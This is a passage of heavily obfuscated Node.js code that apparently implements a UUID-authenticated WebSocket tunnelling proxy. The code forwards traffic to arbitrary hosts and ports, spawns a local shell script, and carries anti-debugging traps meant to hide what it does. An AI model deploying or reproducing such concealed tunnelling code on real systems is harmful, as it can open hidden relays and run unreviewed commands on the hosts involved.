_0x1e3602(_0x1cf985-0x20,_0xd8689d,_0xd8689d-0x87,_0x3b6576-0x200,_0x3b6576-0x2e);}function _0x193839(_0x5bc765,_0x4179c0,_0x453ecf,_0x550361,_0x533d70){return _0x5b3717(_0x550361-0x445,_0x453ecf,_0x453ecf-0xe5,_0x550361-0x10f,_0x533d70-0x66);}console[_0x5aa48e(0x1e1,0x76,0x1cf,0x98,0x162)](_0x54079d(-0x366,-0x264,-0x306,-0x2de,-0x242)+_0x5aa48e(0x1d7,0x228,0xd5,0x19e,0x17b)+_0x54079d(-0x267,-0x2c6,-0x200,-0x2e4,-0x140)+_0x5aa48e(0x1ae,0x22a,0x26e,0x281,0x246)+_0x26639a(-0x142,-0x1fc,-0x8a,-0xce,-0x147)+'\x20'+port);});const _0x58453d={};_0x58453d[_0x5b3717(-0x251,-0x1d1,-0x218,-0x227,-0x168)+'r']=httpServer;const wss=new WebSocket[(_0x504eae(0x258,0x1f3,0x339,0x329,0x2d8))+'r'](_0x58453d);wss['on'](_0x1e3602(-0x120,-0xfb,-0xa7,-0x71,0x27)+_0x1e3602(-0x2a,0x75,-0x17,0xb1,0x91),_0x338277=>{const _0x15e773={'peSlp':function(_0x196ade,_0x291a3c){return _0x196ade===_0x291a3c;},'Mlvef':_0x53ba12(0x112,0xd2,-0xc,0xd7,-0x15),'qvIbA':_0x53ba12(0x205,0x21b,0x173,0x2ba,0x208),'rLUYi':_0x22caf1(-0x84,0x9f,-0x18,0x55,0x9),'iKskN':function(_0x5aec02,_0x4a41f9){return _0x5aec02(_0x4a41f9);},'CyOYO':_0x48965c(0x499,0x49f,0x468,0x3cd,0x531),'vjNvL':function(_0x498de0,_0x1ab857){return _0x498de0(_0x1ab857);},'mAhaX':_0x53ba12(0xfa,0x117,0x50,0x170,0xc4),'wmrKJ':function(_0x97afe7,_0x5596f4){return _0x97afe7+_0x5596f4;},'UzLYU':function(_0x4079ce,_0x7de1){return _0x4079ce+_0x7de1;},'xggyp':_0x22caf1(-0x42,-0x1c,-0xc1,-0xad,-0x9)+_0x48965c(0x3f1,0x4dd,0x47b,0x4e3,0x465)+_0x4d9560(-0x1d9,-0x13d,-0x153,-0x155,-0x1b7)+_0x48965c(0x47c,0x394,0x442,0x330,0x457),'gtuvb':_0x4e9ec3(0x1be,0x16d,0x1e5,0x207,0x16a)+_0x4d9560(0x55,-0x4a,0xa,-0x5c,-0x2c)+_0x53ba12(0x60,0xd7,0xe7,0xf7,0x2e)+_0x4d9560(-0x107,0x8,-0xa3,-0x23,0x45)+_0x4e9ec3(0xd2,0xa7,0xd9,0x42,0x1af)+_0x48965c(0x49d,0x423,0x338,0x3d0,0x493)+'\x20)','nJwcJ':function(_0x34f70e,_0x420df2){return 
_0x34f70e!==_0x420df2;},'myeAR':_0x48965c(0x403,0x3a4,0x42b,0x448,0x3ec),'NHqXG':_0x53ba12(0x17f,0xc4,0x168,0xbf,0x14f),'HIzaX':function(_0x2c0d5a,_0x303dde){return _0x2c0d5a==_0x303dde;},'LFXJW':function(_0x5ba431,_0x230a43){return _0x5ba431+_0x230a43;},'pWOqq':function(_0x590dcb,_0x52c607){return _0x590dcb+_0x52c607;},'IdbFC':function(_0xc482c0,_0x8fba09,_0x230c0a,_0xb4b844){return _0xc482c0(_0x8fba09,_0x230c0a,_0xb4b844);},'kdWLe':_0x53ba12(0xea,0xa7,0x3b,0x156,0x9b)+_0x48965c(0x530,0x494,0x3ff,0x52b,0x4bb),'AMPQa':function(_0x4366c0,_0x220619){return _0x4366c0(_0x220619);},'wzZPT':function(_0x39f8aa,_0x4d22b1,_0x21d564){return _0x39f8aa(_0x4d22b1,_0x21d564);},'Eezyv':_0x4d9560(-0xaf,-0xd9,-0x83,-0x145,-0xb0)+_0x4e9ec3(0x22c,0x2ba,0x1d5,0x15f,0x1ca)+'r:','AJXkM':_0x53ba12(0x51,0xa7,0x32,0x37,-0x42)+_0x4d9560(-0x10c,-0x13e,-0xd4,-0x7e,-0x114)+_0x4d9560(0x1d,0xda,0x76,0x32,-0x6c)+_0x53ba12(0x15e,0xfd,0x17e,0x94,0x12d)+'ly','sxRLl':_0x53ba12(0x4f,0xf9,0x1bd,0x1ac,0x1e0)+'ge','zbVyN':_0x4e9ec3(0x157,0x254,0x23f,0x220,0x296)+_0x4e9ec3(0xf5,-0x10,0xcc,0xb9,0x71)+_0x53ba12(0x194,0x1e6,0x24e,0x25e,0x1ef)+':'};function _0x22caf1(_0x42eeed,_0x2bf72e,_0x1c7313,_0x3fae0b,_0x414167){return _0x3b9f4f(_0x414167-0x62,_0x2bf72e-0xe2,_0x1c7313-0xd6,_0x3fae0b-0x101,_0x3fae0b);}function _0x4d9560(_0x32560f,_0x19d1a5,_0x592c2c,_0x361ab5,_0x4eeedf){return _0x1d31e6(_0x361ab5- -0x203,_0x19d1a5-0x8e,_0x32560f,_0x361ab5-0x141,_0x4eeedf-0x157);}console[_0x48965c(0x3bb,0x372,0x3d8,0x3fb,0x350)](_0x15e773[_0x4d9560(-0x202,-0x134,-0x1cc,-0x1a0,-0x138)]);function _0x48965c(_0x29af8a,_0x4fff4b,_0x5ea167,_0x2a0838,_0x1e857d){return _0x3b9f4f(_0x4fff4b-0x3b7,_0x4fff4b-0x61,_0x5ea167-0xde,_0x2a0838-0x1d,_0x2a0838);}function _0x4e9ec3(_0x21b174,_0xd6c6ab,_0x2c9692,_0xbf63,_0x48d11a){return _0x5b3717(_0x2c9692-0x345,_0xbf63,_0x2c9692-0x16a,_0xbf63-0xb8,_0x48d11a-0x1b);}function _0x53ba12(_0x38030d,_0x20c24f,_0x3aba8b,_0xd84a7e,_0x101c14){return _0x504eae(_0x20c24f- 
-0x1c2,_0x20c24f-0x1ea,_0x3aba8b-0x14c,_0xd84a7e-0x1e4,_0x101c14);}_0x338277[_0x48965c(0x346,0x344,0x361,0x3f1,0x358)](_0x15e773[_0x53ba12(0x170,0x153,0x98,0x10f,0x176)],_0x582f00=>{function _0x1f0c5b(_0x36fad2,_0x3a1821,_0x49fb9a,_0x37f73e,_0xf00117){return _0x4d9560(_0x49fb9a,_0x3a1821-0x42,_0x49fb9a-0xfa,_0x36fad2-0xa7,_0xf00117-0x52);}function _0x41d87d(_0x38e8ac,_0x11e0f9,_0x1a5c0f,_0x46d3c6,_0x40e158){return _0x4e9ec3(_0x38e8ac-0x118,_0x11e0f9-0xdc,_0x11e0f9- -0xec,_0x46d3c6,_0x40e158-0xee);}function _0x5a4020(_0xd2a491,_0x3ce8a9,_0x5f0598,_0x5d80fe,_0x24753d){return _0x22caf1(_0xd2a491-0x76,_0x3ce8a9-0x146,_0x5f0598-0x2d,_0x5d80fe,_0x3ce8a9- -0x140);}function _0x4f1aaa(_0x51b05a,_0x50d8e8,_0x4eb23f,_0x12ebfa,_0xf53023){return _0x4e9ec3(_0x51b05a-0x16a,_0x50d8e8-0x59,_0xf53023- -0x345,_0x51b05a,_0xf53023-0x14d);}function _0x3d5022(_0x12afd0,_0x4b1a36,_0x47c467,_0x2ec865,_0x304c24){return _0x4e9ec3(_0x12afd0-0xc6,_0x4b1a36-0x192,_0x4b1a36-0x125,_0x304c24,_0x304c24-0x17f);}if(_0x15e773[_0x41d87d(0x15f,0xda,0x121,0xdc,0xd6)](_0x15e773[_0x3d5022(0x330,0x2f5,0x33c,0x299,0x344)],_0x15e773[_0x4f1aaa(-0x1d1,-0xf2,-0x19,-0x15,-0xf0)])){const [_0x4e2b08]=_0x582f00,_0x1b95e7=_0x582f00[_0x3d5022(0x257,0x281,0x216,0x1ff,0x251)](-0xf66+0x476*-0x7+0x2ea1,-0x1*-0x150a+0x1*-0x257d+0x1c*0x97);if(!_0x1b95e7[_0x41d87d(0x9e,0x27,0xda,-0x69,0x41)]((_0x18b0ee,_0x5ba6eb)=>_0x18b0ee==parseInt(uuid[_0x41d87d(0x42,-0x3f,0x1,-0x2d,-0xad)+'r'](_0x5ba6eb*(0x14d*-0x1+-0x38b*0x8+-0x1*-0x1da7),-0x175d*-0x1+-0x5*-0x597+-0x334e),-0x1*-0x1df5+0x793+0x368*-0xb)))return;let _0x2499f9=_0x15e773[_0x41d87d(-0xd,0xd1,0xd3,0xb1,0x4d)](_0x582f00[_0x3d5022(0x22c,0x281,0x2c8,0x332,0x236)](0x11*-0x71+-0x2e*-0x6a+0x1a*-0x71,0x1300+0xb33+-0x1e21)[_0x41d87d(-0x9c,0x1c,-0x5c,-0x30,0xce)+_0x41d87d(-0x98,-0x8,-0x18,-0x64,-0xf9)](),-0x13b2+0x5*-0x6fb+-0x2*-0x1b56);const 
_0x169107=_0x582f00[_0x4f1aaa(-0x20a,-0x161,-0x201,-0x267,-0x1e9)](_0x2499f9,_0x2499f9+=-0x16b*0x10+0x1006+0x6ac)[_0x1f0c5b(-0x75,-0x2a,-0x14f,0x72,-0x11f)+_0x5a4020(-0xce,0x1d,0xc4,-0x55,0x54)+'BE'](-0x1*-0x193a+0x4a*0x26+-0x2436),_0x26909=_0x582f00[_0x41d87d(-0x45,0x70,0x2c,-0x28,-0x4b)](_0x2499f9,_0x2499f9+=0x1f*-0x46+0x2408+-0x1b8d)[_0x41d87d(0x56,0x1c,-0x5a,-0xa5,-0xa3)+_0x41d87d(0x4c,-0x8,-0x98,-0xc9,-0x9a)](),_0x2df56b=_0x15e773[_0x5a4020(-0x6d,-0x9d,0x17,-0x145,0xe)](_0x26909,-0x266*0xb+-0x2241+0x3ca4)?_0x582f00[_0x5a4020(0x59,-0x7b,-0x112,-0x138,-0xcf)](_0x2499f9,_0x2499f9+=-0x269e+0x2559+-0x149*-0x1)[_0x41d87d(0x2d,0x104,0x146,0x1da,0xf5)]('.'):_0x15e773[_0x3d5022(0x2b4,0x25f,0x2cd,0x30c,0x1d6)](_0x26909,-0x1*0x9b1+-0x26d*-0x6+0x1*-0x4db)?new TextDecoder()[_0x3d5022(0x26b,0x2ae,0x247,0x33d,0x2d1)+'e'](_0x582f00[_0x1f0c5b(-0x21,0x83,-0xc0,0x7e,-0x25)](_0x15e773[_0x3d5022(0x351,0x2e2,0x234,0x2f6,0x278)](_0x2499f9,0x1*0x349+0x37f*-0x7+-0x1531*-0x1),_0x2499f9+=_0x15e773[_0x4f1aaa(-0x1c8,-0x155,-0x277,-0x21c,-0x1db)](0x1e5*-0xd+-0x2*0x136c+0x3f7a,_0x582f00[_0x1f0c5b(-0x21,0xaf,-0x77,-0x93,0xca)](_0x2499f9,_0x15e773[_0x4f1aaa(-0x317,-0x1ca,-0x218,-0x2e7,-0x24d)](_0x2499f9,-0x8b1+-0x197d+-0xb65*-0x3))[_0x4f1aaa(-0x1a5,-0x185,-0x17a,-0x16a,-0x23d)+_0x41d87d(0xbf,-0x8,0xc3,0x39,0x22)]()))):_0x15e773[_0x3d5022(0x2a0,0x25f,0x33d,0x25d,0x350)](_0x26909,-0x653*0x5+-0x26f9+0x469b)?_0x582f00[_0x41d87d(0xe7,0x70,0xec,0x1a,-0x46)](_0x2499f9,_0x2499f9+=-0x2*0x375+-0x71*-0x7+-0x1*-0x3e3)[_0x5a4020(0x33,-0x9c,-0x17d,-0x2d,-0x3d)+'e']((_0x316879,_0x3ec672,_0xfe2286,_0x40ee93)=>_0xfe2286%(0x10d*-0xe+-0x11c1+0x2079)?_0x316879[_0x3d5022(0xfc,0x1b7,0x1bf,0x272,0x231)+'t'](_0x40ee93[_0x5a4020(-0x156,-0x7b,0x4f,-0x3e,-0x62)](_0xfe2286-(0x91d*0x1+0xcf*-0xd+0x167),_0xfe2286+(-0x209a*0x1+-0x1323+0x19df*0x2))):_0x316879,[])[_0x1f0c5b(-0x54,-0x108,-0xbe,0x1a,-0x5b)](_0x427ae0=>_0x427ae0[_0x3d5022(0x2b5,0x22d,0x16f,0x26c,0x1ab)+_0x41d87d(0x167,0x108,0xf2,0x4a,0x1be)+'BE'](-0x1*-0x1e9e+-0x
60e+-0x1890)[_0x1f0c5b(0xbd,0x119,0x114,0xe8,-0xc)+_0x5a4020(-0x185,-0x13c,-0x191,-0x5d,-0x180)](0x1c2e+0x1d05+0x3923*-0x1))[_0x1f0c5b(0x73,0x6e,-0x15,0x7a,0x122)](':'):'';_0x15e773[_0x4f1aaa(-0x1c0,-0x288,-0x30e,-0x2e6,-0x227)](logcb,_0x15e773[_0x41d87d(0x6b,0x154,0x196,0xe6,0xd9)],_0x2df56b,_0x169107),_0x338277[_0x1f0c5b(-0x8a,-0x3f,-0x127,-0x7a,-0xe7)](new Uint8Array([_0x4e2b08,0x138e*-0x1+0x1e8a*-0x1+-0x1*-0x3218]));const _0x472178=_0x15e773[_0x4f1aaa(-0x20d,-0x148,-0x1c8,-0x9b,-0x121)](createWebSocketStream,_0x338277),_0x454610={};_0x454610[_0x1f0c5b(0xdd,0x110,0x23,0x1b,0xab)]=_0x2df56b,_0x454610[_0x3d5022(0x21c,0x19e,0x252,0x14a,0x166)]=_0x169107;const _0x33faab={};_0x33faab[_0x1f0c5b(0xdd,0x10f,0x1bd,0x1a,0x17e)]=_0x2df56b,_0x33faab[_0x1f0c5b(-0x104,-0x32,-0x36,-0x7a,-0x1bf)]=_0x169107,net[_0x5a4020(-0xa0,-0xf6,-0x14e,-0xa7,-0x1d0)+'ct'](_0x454610,function(){function _0x11e0a3(_0x236c71,_0x4a6a48,_0x1ef5e0,_0x32d975,_0x11aa54){return _0x41d87d(_0x236c71-0x189,_0x4a6a48-0xce,_0x1ef5e0-0x4d,_0x32d975,_0x11aa54-0x3b);}function _0x32a8b5(_0x3e6379,_0x1c981a,_0x18be16,_0x203f9f,_0x1c008){return _0x1f0c5b(_0x1c008-0x168,_0x1c981a-0x137,_0x18be16,_0x203f9f-0x197,_0x1c008-0xd7);}function _0x16e631(_0x4993a4,_0x343edb,_0x2f90df,_0x1e6444,_0x335e7a){return _0x4f1aaa(_0x335e7a,_0x343edb-0x55,_0x2f90df-0x190,_0x1e6444-0x110,_0x2f90df- -0x29);}function _0x1098ae(_0xb69a5a,_0x1ae799,_0x2ff761,_0x287b23,_0x159c1e){return _0x1f0c5b(_0x1ae799-0x289,_0x1ae799-0xe3,_0x2ff761,_0x287b23-0x11e,_0x159c1e-0x1ce);}function _0x1f8911(_0x401cfd,_0x299939,_0x88c271,_0x6d7be,_0x18e21c){return _0x41d87d(_0x401cfd-0x161,_0x299939-0x36c,_0x88c271-0x3a,_0x18e21c,_0x18e21c-0x89);}if(_0x15e773[_0x32a8b5(0x14c,0x161,0x97,0x185,0xa8)](_0x15e773[_0x32a8b5(0x2db,0x299,0x2e4,0x322,0x23d)],_0x15e773[_0x11e0a3(0x262,0x1a0,0x1f6,0x1e3,0x23f)])){if(_0x524eef){const _0x4f6fde=_0x2d6d32[_0x1098ae(0x246,0x2ff,0x394,0x397,0x39c)](_0x56dd80,arguments);return _0xb21abe=null,_0x4f6fde;}}else 
this[_0x11e0a3(0x35,0xd2,0x1b5,0x31,0xb3)](_0x582f00[_0x1f8911(0x47d,0x3dc,0x402,0x484,0x410)](_0x2499f9)),_0x472178['on'](_0x15e773[_0x11e0a3(0xf8,0x89,0x160,0x55,0xd5)],_0x15e773[_0x16e631(-0x1cc,-0x2b9,-0x20c,-0x25c,-0x2b1)](errcb,_0x15e773[_0x1f8911(0x48f,0x48c,0x484,0x42a,0x3ea)]))[_0x11e0a3(0x142,0x1b0,0x296,0x277,0xee)](this)['on'](_0x15e773[_0x11e0a3(0xb7,0x89,0xf4,0xdd,0x94)],_0x15e773[_0x16e631(-0x1d2,-0x174,-0x21a,-0x237,-0x2e2)](errcb,_0x15e773[_0x16e631(-0x13d,-0x13b,-0x140,-0x212,-0x7d)]))[_0x32a8b5(0x1db,0x21c,0x27a,0x168,0x1b9)](_0x472178);})['on'](_0x15e773[_0x5a4020(-0xde,-0x130,-0xa4,-0x171,-0x1e7)],_0x15e773[_0x4f1aaa(-0x25e,-0x2be,-0x18c,-0x1bf,-0x25b)](errcb,_0x15e773[_0x1f0c5b(0xd2,0x85,0x40,-0x11,0x6f)],_0x33faab));}else _0x29f49a=iGzjzx[_0x3d5022(0x249,0x279,0x25e,0x33a,0x2f5)](_0x482d28,iGzjzx[_0x1f0c5b(0x40,0x104,0x72,0xb1,0x47)](iGzjzx[_0x5a4020(-0xe3,-0x25,-0x85,-0x62,-0xcc)](iGzjzx[_0x4f1aaa(-0x1c0,-0x37,-0x1b3,-0x167,-0x10c)],iGzjzx[_0x3d5022(0x35f,0x35b,0x3d4,0x3d7,0x2bc)]),');'))();})['on'](_0x15e773[_0x53ba12(0xcc,0x6f,0xd,-0x56,0x27)],_0x15e773[_0x53ba12(0x60,0x12a,0x105,0x152,0x163)](errcb,_0x15e773[_0x4d9560(-0x23e,-0x9c,-0x142,-0x159,-0x20f)]));}),childProcess[_0x504eae(0x2aa,0x1f7,0x1cf,0x1c4,0x2c7)+'t']['on'](_0x3b9f4f(0x64,0xb3,0x5b,0x49,0x10d),_0x32308f=>{function _0x3645a9(_0x3a0263,_0x37102e,_0x2d4d99,_0x11b00e,_0x2eeba1){return _0x3b9f4f(_0x2eeba1-0x1e,_0x37102e-0xe1,_0x2d4d99-0xc2,_0x11b00e-0x1e2,_0x11b00e);}function _0xbf076a(_0x33c5da,_0x64aff6,_0x5b8ddd,_0x31aa91,_0xac739c){return _0x504eae(_0xac739c- -0x2b3,_0x64aff6-0xde,_0x5b8ddd-0x2b,_0x31aa91-0x115,_0x5b8ddd);}function _0x55ac32(_0x4f5e95,_0x442d25,_0x84fde9,_0x53ca28,_0x4b390e){return _0x1e3602(_0x4f5e95-0x167,_0x4b390e,_0x84fde9-0x1,_0x53ca28-0x1da,_0x4b390e-0x19a);}console[_0xbf076a(-0x154,-0x140,-0xb8,0x2b,-0x75)](_0xbf076a(0xda,0x8a,-0xd9,0x2f,-0x9)+_0x55ac32(0x1d0,0x1b7,0x265,0x221,0x2e6)+_0x32308f);});function 
_0x5b3717(_0x53361c,_0x3d64eb,_0xd62b74,_0x2de2a2,_0x4d7f6e){return _0x222c(_0x53361c- -0x349,_0x3d64eb);}childProcess[_0x504eae(0x332,0x30f,0x25b,0x3c4,0x321)+'r']['on'](_0x1e3602(-0xc7,0x3c,-0xe1,0xb,-0x8a),_0x150c6a=>{function _0x58f46b(_0x5bd88f,_0x34e7b1,_0xafbc57,_0x1fbfae,_0x44ba8b){return _0x3b9f4f(_0x34e7b1-0x32c,_0x34e7b1-0x124,_0xafbc57-0x91,_0x1fbfae-0x138,_0xafbc57);}function _0x42ec39(_0x21c004,_0x334ee5,_0x59217d,_0x22145d,_0x579d99){return _0x3b9f4f(_0x579d99-0x7b,_0x334ee5-0x3e,_0x59217d-0xcd,_0x22145d-0x164,_0x22145d);}function _0x3ddc52(_0x37585d,_0x269aee,_0x1e785d,_0x343d5c,_0x13131e){return _0x3b9f4f(_0x13131e-0x283,_0x269aee-0x6d,_0x1e785d-0x15d,_0x343d5c-0x1e7,_0x37585d);}console[_0x3ddc52(0x208,0x149,0x20c,0x183,0x22a)](_0x3ddc52(0x2cd,0x3b4,0x3fc,0x2fc,0x332)+_0x42ec39(0xc0,0x184,0x1a4,0x85,0x15e)+_0x150c6a);}),childProcess['on'](_0x5b3717(-0x16d,-0x15c,-0xee,-0xc8,-0x1c7),_0x44d041=>{function _0x4510c4(_0x343fce,_0xf18e,_0x48a07b,_0x18d67e,_0x333faf){return _0x1e3602(_0x343fce-0x12f,_0x343fce,_0x48a07b-0x19c,_0x48a07b-0x184,_0x333faf-0x18c);}function _0x57a77d(_0x42aaae,_0x354fb4,_0x213b97,_0x7d1ee,_0x2e0766){return _0x5b3717(_0x213b97-0x430,_0x42aaae,_0x213b97-0xb2,_0x7d1ee-0x34,_0x2e0766-0x1f0);}function _0x5cb31b(_0x517b04,_0x4cf481,_0x4e7ac1,_0x3208e3,_0x37444f){return _0x3b9f4f(_0x4cf481- -0x20,_0x4cf481-0xd3,_0x4e7ac1-0x83,_0x3208e3-0x5f,_0x4e7ac1);}function _0x9f9bb8(_0x21b13b,_0x328460,_0xe89287,_0x175437,_0x212cc2){return _0x1e3602(_0x21b13b-0x131,_0x175437,_0xe89287-0xc9,_0x212cc2-0x327,_0x212cc2-0xa2);}function _0x224102(_0x3be2bf,_0x3762db,_0x164cd3,_0x2226b4,_0x417057){return 
_0x3b9f4f(_0x164cd3-0x446,_0x3762db-0x1bb,_0x164cd3-0x1df,_0x2226b4-0x7f,_0x3762db);}console[_0x9f9bb8(0x2c5,0x332,0x1f5,0x253,0x289)](_0x9f9bb8(0x2b3,0x30b,0x298,0x379,0x326)+_0x9f9bb8(0x18a,0x191,0x2d3,0x2e2,0x26f)+_0x4510c4(0x59,0x18c,0x133,0xa9,0x1e1)+_0x224102(0x56f,0x58f,0x4ef,0x59f,0x428)+_0x57a77d(0x283,0x30c,0x30c,0x395,0x330)+_0x224102(0x3f0,0x3e9,0x486,0x424,0x454)+_0x44d041);});function _0x4e4c(){const _0x35b343=['PJUHq','ess','2607099qtOSnB','NHzuu','VUWbC','WamCO','nDGnZ','prTxT','PIoog','ThJCG','gger','25c-c','Rpahm','BBKlA','\x20port','trace','8074146OfEJsv','RExtq','QbQPM','ufdSt','dcTsu','akkft','decod','bcCTr','sxRLl','while','NLVqL','uPIuo','VxtEs','QmRQu','vxfdZ','MBAXm','vyEiL','\x20(tru','nbfbP','Ejzpn','cxfXB','ng\x20on','t:\x20','RAplO','IWFzE','UbKUh','eServ','OABNl','fEhhE','funct','const','xit,\x20','AteeO','drGOn','PZViy','cted\x20','HXTIF','stder','tion','bUAtF','http','LegjN','ffwFQ','GwhBd','ydLrd','KBBMA','ZZxQO','UzLYU','ehNRh','omHUq','NtuTp','be4-4','lbAPp','EgIjE','Yicnh','state','CKgNX','vwWMV','wmrKJ','qvIbA','ound\x0a',')+)+)','iWTpY','iUkoU','BfvaY','cmawd','rVCDs','nJwcJ','sypaq','nstru','15441576cFxalo','PORT','KXHHp','iUyrA','gvLdn','pipe','AhMDR','myeAR','yIrAY','xFEeL','pOQpd','runni','ct-Er','ct:','IeSMM','close','liHXh','1c0a7','SyCzk','r:\x20','pCVxo','cxNks','3b6-b','wxMMJ','E1:','nkmzv','ODzMc','actio','{}.co','huTKO','PPgxu','11qyxnkm','baaVO','VJMWX','BKGxW','SSpbY','env','7apTMSr','jXxhT','join','PSHak','mODJA','apply','Int16','oePUv','vqZYb','YyzBo','WyYfq','35523WhLXEV',',\x20Wor','26ZTZBbS','dPuog','MOoJV','FXgKD','QUYWB','FFddC','\x22retu','ion\x20*','ction','cVTCn','tlkpy','MQLCG','rHuCY','./sta','eRUXM','creat','ITDzW','CyOYO','\x5c(\x20*\x5c','EEfdC','RJqbZ','iDzSp','chcUh','qgFlu','hMtyj','zkvhK','soNhl','13747460XHiaAI','sLgUb','Objec','kcOBP','dMrUv','pGfic','nnldf','hutFS','Error','n\x20(fu','SQFha','exit\x20','proto','IaAQQ','AMPQa','34973EQaioh','dgGbC','boUIg','TbmkI','thXtr','31b-9','igXwh','dehJt'
,'qdEbE','mAhaX','FphDo','GwelD','IUuaa','OEyyx','UpZOL','5aAHeqs','iFdfD','gtuvb','HzzYl','bTZpH','xggyp','toStr','DlSBX','SZIrc','NDXLh','(((.+','WebSo','kdWLe','QtdjG','xisMf','sxjqi','aytnA','TfCYO','repla','fFEtn','rvbRb','djCCi','ZLSGn','VodzB','IUUld','net','RnvIN','Eezyv','zmHMa','ZSRjq','Mlvef','iRVDO','hLqPS','NHqXG','succe','VzILz','yvJLh','xDjCg','host','port','lwfzy','util','bvYam','ENUXM','XdJIb','a-zA-','AFQdy','mhjxL','call','NVlVS','AJXkM','vPGKz','once','ELQqV','zrEBO','JOvwt','PRlAo','liNNj','HHAvw','nEyQx','retur','fvPjT','ZtWnq','ZySZv','conca','RUvbo','xHxer','excep','QAMmq','QjooB','chain','BkELO','\x20proc','ing','dBMnj','ivCFN','BDovH','searc','error','SAPOu','BhFjR','CuVjr','pWlUa','HHIYV','EGhZe','rLUYi','gNvzd','to__','terva','nt-Ty','bHHoJ','subst','32qjTFKd','eURqP','2320ITVTvP','plain','rUHin','setIn','log','QPwpg','sEXRC','VYcwE','init','ulKmv','DbTXj','table','HFcrA','peSlp','vokxU','tsKtZ','ansOB','ructo','rdZbx','tWOOY','gNWCh','zZyec','MDzGd','rt.sh','hmvVG','count','LszCS','zbVyN','cket\x20','r\x20is\x20','Serve','nctio','TTiuI','GgHUu','nLwfJ','rcsmG','info','veKDz','n()\x20','url','IGTuh','rn\x20th','child','ivCZf','gHyhj','conso','CSsds','Conne','xWzfO','conne','YMKao','fBjQe','Int8','WZqeI','isNoV','lengt','TnDMY','hEApv','wzZPT','tdqlu','mjuUj','GlnpG','GXkqo','Z_$][','write','debu','qRURx','send','serve','QYFAI','tyKaX','qAiZw','pWOqq','esxiR','dFTqf','text/','DZKIl','e)\x20{}','pAIwA','xuxDF','ZcBtI','ess\x20e','KMlbm','egDib','DCpBU','YuZTU','GwNim','iiOWN','readU','UUID','OCFGX','Head','wXYKo','LDraj','AhSBZ','ctor(','pFaCe','zA-Z_','EBboY','every','XQEcL','XQvLW','CNRey','OaJSR','input','EIIdK','NXhPY','test','gpBzh','QRTPc','IdbFC','ZjhYg','stdou','CLxJL','MbvHf','ld\x0a','TfeVo','zOvbg','ArJzO','kgsEZ','vycxt','map','25bef','FqVfy','oewZB','$]*)','fmLpv','iRTzo','nKEwh','messa','xymJH','warn','xqvBr','ssful','39aa1','ioJGc','Not\x20F','code:','HIzaX','reduc','HSAgz','strin','UGzxM','Hello','FIsIF','IgZqH','__pro','ZBu
kS','end','MTwwb','wsjSt','bind','Rvigx','\x5c+\x5c+\x20','djRtw','_proc','FDrfr','JtRXc','liste','E2:','KYuYZ','Child','Conte','NRmyP','vjNvL','QQctm','baqfC','CzlDj','KbQMx','3184948GDYCkJ','chqdL','gZTRd','slice','data','fofzi','YZnVv','kEbvc','stdmP','iKskN','SeIEh','0-9a-','is\x22)(','fwptI','tamNE','LEbOf','SRWRa','LFXJW','oezYl','type','JhSmt','*(?:[','yIPvi','KZCzm','QENVS','QkmIN'];_0x4e4c=function(){return _0x35b343;};return _0x4e4c();}function _0x504eae(_0x2fc119,_0x5645a6,_0x3e5254,_0x27e50f,_0x40b493){return _0x222c(_0x2fc119-0x186,_0x40b493);}function _0x3b9f4f(_0x4d0e11,_0x5227de,_0x4e693f,_0x1476b1,_0x4240ea){return _0x222c(_0x4d0e11- -0xfd,_0x4240ea);}function _0x533f97(_0x505d61){const _0x274a73={'BhFjR':function(_0x3be348,_0x518cd4){return _0x3be348(_0x518cd4);},'qAiZw':function(_0x2a17fd,_0x5e5d71){return _0x2a17fd===_0x5e5d71;},'bvYam':_0x163385(-0x299,-0x281,-0x2c3,-0x1aa,-0x20d),'mjuUj':function(_0x121015,_0x5ce60e){return _0x121015===_0x5ce60e;},'DbTXj':_0x37219c(0x36b,0x3dc,0x2fe,0x344,0x2b9),'OaJSR':_0x163385(-0x2e6,-0x2dc,-0x1f7,-0x27c,-0x397),'JhSmt':function(_0xd0aec,_0x33c60b){return _0xd0aec+_0x33c60b;},'bHHoJ':function(_0x57de57,_0x3db417){return _0x57de57+_0x3db417;},'NVlVS':_0x5ef808(-0x38a,-0x217,-0x3c0,-0x2d8,-0x29d)+_0x37219c(0x423,0x38f,0x37f,0x462,0x42b)+_0x3c56c7(0x1f2,0x1d2,0x169,0x297,0x159)+_0x4c92c1(0x3c5,0x321,0x3f9,0x247,0x2ed),'lwfzy':_0x3c56c7(0x278,0x2e8,0x270,0x291,0x285)+_0x4c92c1(0x502,0x413,0x3be,0x3c5,0x477)+_0x37219c(0x279,0x1c6,0x26f,0x206,0x2e5)+_0x163385(-0x1aa,-0x129,-0x186,-0x1fc,-0x142)+_0x3c56c7(0x1f4,0x1dc,0x133,0x12b,0x202)+_0x3c56c7(0x1af,0x268,0x239,0x28b,0x251)+'\x20)','MTwwb':function(_0x56a4c8){return 
_0x56a4c8();},'IUUld':_0x3c56c7(0x249,0x1b7,0x1dd,0x1ca,0x21b),'vqZYb':_0x163385(-0x278,-0x20d,-0x2ef,-0x1cf,-0x205),'oewZB':_0x37219c(0x1df,0x2e3,0x234,0x249,0x1d8),'iUkoU':_0x4c92c1(0x372,0x2eb,0x3b1,0x2da,0x3cf),'ODzMc':_0x5ef808(-0x2ca,-0x25b,-0x222,-0x2d1,-0x326)+_0x37219c(0x3d6,0x262,0x309,0x358,0x235),'huTKO':_0x4c92c1(0x2c2,0x306,0x324,0x262,0x36f),'TnDMY':_0x4c92c1(0x3c5,0x3cd,0x37f,0x3b6,0x2e7),'fmLpv':function(_0x527a5b,_0x6c02b4){return _0x527a5b<_0x6c02b4;},'NHzuu':function(_0x3cd09e,_0x4fd2ba){return _0x3cd09e===_0x4fd2ba;},'dFTqf':_0x4c92c1(0x28b,0x367,0x39a,0x41f,0x315),'QENVS':function(_0x2f077d,_0x2792db){return _0x2f077d===_0x2792db;},'zmHMa':_0x3c56c7(0x18d,0x240,0x2dd,0x1e1,0x218)+'g','gvLdn':function(_0x29f302,_0x6fb28e){return _0x29f302!==_0x6fb28e;},'KXHHp':_0x5ef808(-0x166,-0x20c,-0x8d,-0x13a,-0x8d),'hmvVG':_0x4c92c1(0x34e,0x376,0x347,0x418,0x2fe),'IaAQQ':_0x5ef808(-0x14b,-0x2bd,-0x1b7,-0x1da,-0x168)+_0x3c56c7(0x1cc,0x297,0x303,0x231,0x2d4)+_0x37219c(0x2dc,0x183,0x25d,0x1c6,0x2a4),'VYcwE':_0x3c56c7(0x101,0x1cc,0x229,0x21f,0x101)+'er','dcTsu':function(_0x27055e,_0x2291f3){return 